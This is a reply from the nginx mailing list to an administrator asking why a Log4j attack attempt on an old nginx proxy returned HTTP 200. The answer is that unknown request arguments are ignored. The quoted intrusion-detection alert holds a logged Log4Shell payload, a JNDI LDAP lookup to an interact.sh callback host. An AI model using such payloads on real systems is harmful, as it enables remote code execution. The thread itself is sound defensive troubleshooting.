Hello!
On Wed, Dec 29, 2021 at 03:55:35PM +0100, Mauro Tridici wrote:
> I have an old instance of NGINX (v.1.10.1) running as proxy
> server on a dedicated hardware platform.
> Since the proxy service is reachable from internet, it is
> constantly exposed to cyber attacks.
> In my particular case, it is attacked by a lot of Log4j attack
> attempts from several malicious IPs.
>
> At this moment, an host intrusion detection system (HIDS) is
> running and is protecting the NGINX server: it seems it is
> blocking every malicious attack attempts.
> Anyway, during the last attack mail notification sent by the
> HIDS, I noticed that the NGINX server response was “HTTP/1.1
> 200” and I’m very worried about it.
> Log4j and Java packages are NOT installed on the NGINX server
> and all the servers behind the proxy are not using Log4j.
>
> Could you please help me to understand the reason why the NGINX
> server answer was “HTTP/1.1 200”!?
>
> You can see below the mail notification I received:
>
>
> Attack Notification.
> 2021 Dec 28 20:45:59
>
> Received From: “hidden_NGINX_server_IP”
> >/var/log/nginx/access.log
> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt
> detected."
> Src IP: 166.137.252.110
> Portion of the log(s):
>
> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET
> /?sulgz=${jndi:ldap://“hidden_NGINX_server_IP
> <ldap://%E2%80%9Chidden_server_IP>".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a
> <ldap://193.204.199.214.c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a>}
> HTTP/1.1" 200 3700 "-" "curl/7.64.0" “-"
As you can see from the log line, the request is to "/" with some
additional request arguments ("?sulgz=..."). As unknown request
arguments are usually ignored, it is no surprise that such a
request results in 200.
--
Maxim Dounin
http://mdounin.ru/
_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx